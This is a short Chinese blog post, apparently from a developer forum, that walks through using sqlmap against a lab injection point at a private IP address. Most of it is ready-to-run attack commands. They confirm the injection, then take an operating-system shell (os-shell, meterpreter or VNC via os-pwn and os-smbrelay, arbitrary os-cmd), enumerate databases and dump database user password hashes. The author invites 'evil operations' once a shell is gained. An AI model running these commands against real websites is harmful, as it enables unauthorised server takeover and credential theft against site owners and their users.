sqlmap注入php,Kali-SQLmap寻找注入点入侵电脑

SQLmap命令

测试一次入侵

内网搭建的注入点

1.打开kali终端输入

-u //目标地址,检查该注入点是否存在注入sqlmap -u "http://192.168.207.131/demo/sql.php?news=1"

没有出现红色的报错证明该注入寻在注入

954c918ad7b93d8816dc92422f5de29c.png

2.直接进行暴力拿shell(如果失败进行第三步)sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --os-shell //获取该服务器的shell

5095e29a7fee02129208bb0e2983ea89.png

这里选择该网站使用的语言(默认是PHP)选择4然后一直回车

这里成功获取到shell,权限足够的话,可以直接进行一些邪恶的操作

8a600d60428e2ea6a1a232d922c2b846.png

3.没有获取成功也别急可以试试另外几个sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --os-pwn //获取一个OOB shell,meterpreter或VNC

sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --os-smbrelay // 一键获取一个OOB shell,meterpreter或VNC

sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --os-cmd=OSCMD //执行操作系统命令

4.猜解库名(都不行看这里)sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --dbs //猜解数据库表名

a0633871748fda0bd4a7c19ddd115a2e.png

5.直接猜解数据库的用户名和该数据库密码的哈希值sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --users //枚举数据库管理系统用户

sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --passwords //枚举数据库管理系统用户密码哈希

334b8076be43e43eb1dbdb13b92aab00.png

f96ba0ddfd53db02189ad4e7d7bc755c.png

--小顾

分享到:更多

  • 1
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值